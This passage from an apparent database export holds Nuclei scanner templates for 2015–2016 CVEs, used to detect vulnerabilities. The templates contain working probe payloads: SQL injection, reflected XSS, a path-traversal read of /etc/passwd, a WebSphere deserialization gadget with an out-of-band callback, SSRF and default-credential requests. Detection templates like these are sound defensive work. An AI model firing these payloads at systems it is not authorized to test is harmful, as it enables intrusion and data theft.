\"{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)\"\n\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n# digest: 4b0a00483046022100a76121fd34a701a623fe02d8de446a12a363ff654c9fa1639ad529008c43117a022100e533be8c3fc95b05cc0cc6b3128a8fd970c943c5846fc163dc941f2849144f4d:922c64590222798bb761d5b6d8e72950", "hash": "0d9044e8e46469c1d48c7bea7cb8ec8f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f67" }, "name": "CVE-2015-7377.yaml", "content": "id: CVE-2015-7377\n\ninfo:\n name: WordPress Pie-Register <2.0.19 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Pie Register before 2.0.19 contains a reflected cross-site scripting vulnerability in pie-register/pie-register.php which allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URL.\n impact: |\n Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress Pie-Register plugin (2.0.19 or higher) to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html\n - https://github.com/GTSolutions/Pie-Register/blob/2.0.19/readme.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2015-7377\n - http://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html\n - https://wpvulndb.com/vulnerabilities/8212\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-7377\n cwe-id: CWE-79\n epss-score: 0.00232\n epss-percentile: 0.60606\n cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: genetechsolutions\n product: pie_register\n framework: wordpress\n tags: cve,cve2015,wordpress,wp-plugin,xss,packetstorm,genetechsolutions\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220751822cd9a64218d991be21596af65185eb0cb7a0ce6a8784d0b16b796f15a2d02204fc11d32d252a9e44ee7344d48136104c33912494230c2b75ff8a3c2229b7761:922c64590222798bb761d5b6d8e72950", "hash": "e6f5d8be8ca98b32ef890d343b32be5c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f68" }, "name": "CVE-2015-7450.yaml", "content": "id: CVE-2015-7450\n\ninfo:\n name: IBM WebSphere Java Object Deserialization - Remote Code Execution\n author: wdahlenb\n severity: critical\n description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default).\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches provided by IBM to mitigate this vulnerability.\n reference:\n - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py\n - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-7450\n - http://www-01.ibm.com/support/docview.wss?uid=swg21972799\n - http://www-01.ibm.com/support/docview.wss?uid=swg21970575\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2015-7450\n cwe-id: CWE-94\n epss-score: 0.97122\n epss-percentile: 0.99772\n cpe: cpe:2.3:a:ibm:tivoli_common_reporting:2.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ibm\n product: tivoli_common_reporting\n shodan-query: http.html:\"IBM WebSphere Portal\"\n tags: cve2015,cve,websphere,deserialization,rce,oast,ibm,java,kev\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: text/xml; charset=utf-8\n SOAPAction: \"urn:AdminService\"\n\n \n \n \n \n \n \n rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\n getUnsavedChanges\n {{ generate_java_gadget(\"dns\", \"{{interactsh-url}}\", \"base64-raw\")}}\n rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=\n \n \n \n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'SOAP-ENV:Server'\n - ''\n condition: and\n\n - type: word\n part: interactsh_protocol # Confirms the DNS Interaction\n words:\n - \"dns\"\n\n - type: status\n status:\n - 500\n# digest: 4a0a0047304502202263d3f945c0708bfa178b6c8d0508154a99c03081669fa093be19203c3a7e5b022100e9aa4c463965277d6a051f7f0feb71096361d86520eaab7a85c0efda4d469699:922c64590222798bb761d5b6d8e72950", "hash": "f0dafb47fd3c619c4e6ac3f647b257d1", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f69" }, "name": "CVE-2015-7780.yaml", "content": "id: CVE-2015-7780\n\ninfo:\n name: ManageEngine Firewall Analyzer <8.0 - Local File Inclusion\n author: daffainfo\n severity: medium\n description: ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system, potentially leading to unauthorized access or information disclosure.\n remediation: |\n Upgrade to a version of ManageEngine Firewall Analyzer that is equal to or greater than 8.0 to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/35933\n - http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html\n - http://jvn.jp/en/jp/JVN21968837/index.html\n - https://nvd.nist.gov/vuln/detail/CVE-2015-7780\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2015-7780\n cwe-id: CWE-22\n epss-score: 0.00151\n epss-percentile: 0.50407\n cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zohocorp\n product: manageengine_firewall_analyzer\n tags: cve2015,cve,manageengine,edb,lfi,zohocorp\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"java.sun.com\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/xml\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022033310ce04e506b0032c6fb7238353cd6100a3065b45f93695cea8aa316876c630220603da199c7554c8cf879f5ebe7a88fbe5d407438fc5352e3673a1bf713b3685a:922c64590222798bb761d5b6d8e72950", "hash": "9573fadab1ed82d9df02edee894884a5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f6a" }, "name": "CVE-2015-7823.yaml", "content": "id: CVE-2015-7823\n\ninfo:\n name: Kentico CMS 8.2 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of Kentico CMS.\n reference:\n - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html\n - https://nvd.nist.gov/vuln/detail/CVE-2015-7823\n - http://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N\n cvss-score: 5.8\n cve-id: CVE-2015-7823\n cwe-id: NVD-CWE-Other\n epss-score: 0.00233\n epss-percentile: 0.61409\n cpe: cpe:2.3:a:kentico:kentico_cms:8.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: kentico\n product: kentico_cms\n tags: cve2015,cve,kentico,redirect,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4b0a004830460221009e8f50b85daa26e3fc8e68ec98b52d6c22a387e1dfa6ab6e91be8ce1b8508ab3022100ade33462a8ca04ef6ae72e63331f1d1880a4ba45f2ea2180ff659181ccbb5b57:922c64590222798bb761d5b6d8e72950", "hash": "fa5542a7b9f80efd6ca947e355bb56a9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f6b" }, "name": "CVE-2015-8349.yaml", "content": "id: CVE-2015-8349\n\ninfo:\n name: SourceBans <2.0 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a version of SourceBans that is 2.0 or above, which includes a fix for this vulnerability.\n reference:\n - https://www.htbridge.com/advisory/HTB23273\n - https://nvd.nist.gov/vuln/detail/CVE-2015-8349\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2015-8349\n cwe-id: CWE-79\n epss-score: 0.0013\n epss-percentile: 0.46975\n cpe: cpe:2.3:a:gameconnect:sourcebans:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: gameconnect\n product: sourcebans\n tags: cve2015,cve,xss,sourcebans,gameconnect\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e8c85a9f4b86dd8d0a78a921160b422af2c670de30733405b10f0ba61584956202204fc67969930e7cb905857f698dedf73948092520552cbf14d9a58f53aa98a869:922c64590222798bb761d5b6d8e72950", "hash": "a7e08867e8573c92773a311e461b9ce8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f6c" }, "name": "CVE-2015-8399.yaml", "content": "id: CVE-2015-8399\n\ninfo:\n name: Atlassian Confluence <5.8.17 - Information Disclosure\n author: princechaddha\n severity: medium\n description: Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information.\n remediation: |\n Upgrade to a version higher than 5.8.17 to mitigate the vulnerability.\n reference:\n - https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro\n - https://www.exploit-db.com/exploits/39170/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-8399\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 4.3\n cve-id: CVE-2015-8399\n cwe-id: CWE-200\n epss-score: 0.9655\n epss-percentile: 0.99519\n cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: atlassian\n product: confluence\n shodan-query: http.component:\"Atlassian Confluence\"\n tags: cve2015,cve,edb,atlassian,confluence\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"confluence-init.properties\"\n - \"View Default Decorator\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ea5b816fa70ecf0f1f6be7d3ede507c9fe4a29dae7445d2887f0f4c66bfa8ffa022100f1b0fa913988d0efc69fc8cd0c2779c5ceaf150bf72aa859b66c02efd8f96c9a:922c64590222798bb761d5b6d8e72950", "hash": "4f3a02828b96b193c326ecd49bef2669", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f6d" }, "name": "CVE-2015-8813.yaml", "content": "id: CVE-2015-8813\n\ninfo:\n name: Umbraco <7.4.0- Server-Side Request Forgery\n author: emadshanab\n severity: high\n description: Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.\n impact: |\n The vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further exploitation.\n remediation: |\n Upgrade Umbraco to version 7.4.0 or above to mitigate the vulnerability and apply any necessary patches or security updates.\n reference:\n - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-8813\n - https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce\n - http://www.openwall.com/lists/oss-security/2016/02/18/8\n - http://issues.umbraco.org/issue/U4-7457\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N\n cvss-score: 8.2\n cve-id: CVE-2015-8813\n cwe-id: CWE-918\n epss-score: 0.00511\n epss-percentile: 0.74145\n cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: umbraco\n product: umbraco\n tags: cve2015,cve,ssrf,oast,umbraco\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}\"\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a00473045022050b2f2d4cb0362670660a3a3f24d8775d24b3371b3eac800eec120eca261c2a0022100e10e0949da402a2150d79e9c16d50a38e202ff6c8b4e3c1eecbd5789c9322910:922c64590222798bb761d5b6d8e72950", "hash": "abb5529d19b0f50621190987356361f3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f6e" }, "name": "CVE-2015-9312.yaml", "content": "id: CVE-2015-9312\n\ninfo:\n name: NewStatPress <=1.0.4 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file \"includes/nsp_search.php\", several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Fixed in version 1.0.6\n reference:\n - https://wpscan.com/vulnerability/46bf6c69-b612-4aee-965d-91f53f642054\n - https://g0blin.co.uk/g0blin-00057/\n - https://wordpress.org/plugins/newstatpress/#developers\n - https://nvd.nist.gov/vuln/detail/CVE-2015-9312\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2015-9312\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: newstatpress_project\n product: newstatpress\n framework: wordpress\n tags: cve2015,cve,xss,authenticated,wp,newstatpress,wpscan,wordpress,wp-plugin,newstatpress_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29&page=nsp_search&newstatpress_action=search HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"=7'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"404-to-301\")'\n condition: and\n# digest: 490a004630440220323384f1c4a276c3079649349540d04cea85e2fe8ce4c73d852567ac9fc5ba7b02203375e2c826ab3ce90ed5672b210ae86d810e572690d581ff587260ceceebb4f7:922c64590222798bb761d5b6d8e72950", "hash": "c21ae31645c15300dce896ae5e73942a", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f70" }, "name": "CVE-2015-9414.yaml", "content": "id: CVE-2015-9414\n\ninfo:\n name: WordPress Symposium <=15.8.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Symposium through 15.8.1 contains a reflected cross-site scripting vulnerability via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter which allows an attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update to the latest version of the WordPress Symposium plugin (>=15.8.2) which includes a fix for this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095\n - https://wpvulndb.com/vulnerabilities/8175\n - https://wordpress.org/plugins/wp-symposium/#developers\n - https://nvd.nist.gov/vuln/detail/CVE-2015-9414\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2015-9414\n cwe-id: CWE-79\n epss-score: 0.00111\n epss-percentile: 0.44236\n cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: wpsymposiumpro\n product: wp-symposium\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/wp-symposium\"\n tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'WP Symposium'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100e9ea14ccaf1cec6af62f525d294701a6819909cb884ac9d793d6ab8849904ac5022100d8914e7df61908a6243f8f7a41608d4e7f093bb148158e4c261d0e1e62d2ce17:922c64590222798bb761d5b6d8e72950", "hash": "f257a0aa0a9b47e4a4afd852c68c0ac9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f71" }, "name": "CVE-2015-9480.yaml", "content": "id: CVE-2015-9480\n\ninfo:\n name: WordPress RobotCPA 5 - Directory Traversal\n author: daffainfo\n severity: high\n description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter.\n impact: |\n An attacker can access sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.\n remediation: |\n Update to the latest version of the WordPress RobotCPA 5 plugin to fix the directory traversal vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/37252\n - https://nvd.nist.gov/vuln/detail/CVE-2015-9480\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-9480\n cwe-id: CWE-22\n epss-score: 0.57022\n epss-percentile: 0.97634\n cpe: cpe:2.3:a:robot-cpa:robotcpa:5:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: robot-cpa\n product: robotcpa\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/robotcpa\"\n tags: cve2015,cve,wp-plugin,lfi,edb,wordpress,robot-cpa\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205b6c0951be97607789304e920c017d4688b1910f346389d67f4cd410a0fd8dd0022100a8479311b48571c59e35a2d0bff7ccb7a5fe58be76c4cbe82b6491b1b2d6709b:922c64590222798bb761d5b6d8e72950", "hash": "c59d56381751e1bf5ce9335a3a95d504", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f72" }, "name": "CVE-2016-0957.yaml", "content": "id: CVE-2016-0957\n\ninfo:\n name: Adobe AEM Dispatcher <4.15 - Rules Bypass\n author: geeknik\n severity: high\n description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.\n impact: |\n The vulnerability allows attackers to bypass security rules and potentially gain unauthorized access to sensitive information or perform malicious actions.\n remediation: |\n Upgrade to Adobe AEM Dispatcher version 4.15 or higher to fix the vulnerability.\n reference:\n - https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html\n - https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html\n - https://nvd.nist.gov/vuln/detail/CVE-2016-0957\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2016-0957\n epss-score: 0.03344\n epss-percentile: 0.91144\n cpe: cpe:2.3:a:adobe:dispatcher:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: adobe\n product: dispatcher\n shodan-query: http.component:\"Adobe Experience Manager\"\n tags: cve2016,cve,adobe,aem\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/system/console?.css\"\n\n headers:\n Authorization: \"Basic YWRtaW46YWRtaW4K\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Adobe\"\n - \"java.lang\"\n - \"(Runtime)\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204c01000f7bfc95e33eb45dbcf5a4712b3572527055ecccd3e2921db31c171f3d022069b7039ef57b710a12d2dc565f13665a6328eb7756d5e5304a82666df5c05520:922c64590222798bb761d5b6d8e72950", "hash": "683cebf17bf0d51b22e74db3b346871a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f73" }, "name": "CVE-2016-1000126.yaml", "content": "id: CVE-2016-1000126\n\ninfo:\n name: WordPress Admin Font Editor <=1.8 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Admin Font Editor 1.8 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress Admin Font Editor plugin (1.8 or higher) to fix this vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=526\n - https://wordpress.org/plugins/admin-font-editor\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000126\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000126\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.4505\n cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: admin-font-editor_project\n product: admin-font-editor\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/admin-font-editor\"\n tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Admin Font Editor'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220013dac67a4811933161dbe03eead3bef250ae8d02feba5efd6d39f42544d64e6022100ca5ea281b37719f80730ff5798e2b6963bfd85356337dadb64d627acd3dc86ec:922c64590222798bb761d5b6d8e72950", "hash": "c66800e43b87c93dbe54c7e081f83c17", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f74" }, "name": "CVE-2016-1000127.yaml", "content": "id: CVE-2016-1000127\n\ninfo:\n name: WordPress AJAX Random Post <=2.00 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress AJAX Random Post 2.00 is vulnerable to reflected cross-site scripting.\n impact: |\n This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress AJAX Random Post plugin (2.00 or higher) to fix this issue.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=494\n - https://wordpress.org/plugins/ajax-random-post\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000127\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000127\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45851\n cpe: cpe:2.3:a:ajax-random-post_project:ajax-random-post:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: ajax-random-post_project\n product: ajax-random-post\n framework: wordpress\n tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/ajax-random-post/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Ajax Random Post'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201fa95a038bca7a976d180543ed0e6ed4a47bd232e52e238bbde22284bb929c9502210084219362e0fc7b0176f542d1b9573a5aae5160e1b35b267dd8bf34f6a4cb1a41:922c64590222798bb761d5b6d8e72950", "hash": "882babcabd13627390cd4fb194c44719", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f75" }, "name": "CVE-2016-1000128.yaml", "content": "id: CVE-2016-1000128\n\ninfo:\n name: WordPress anti-plagiarism <=3.60 - 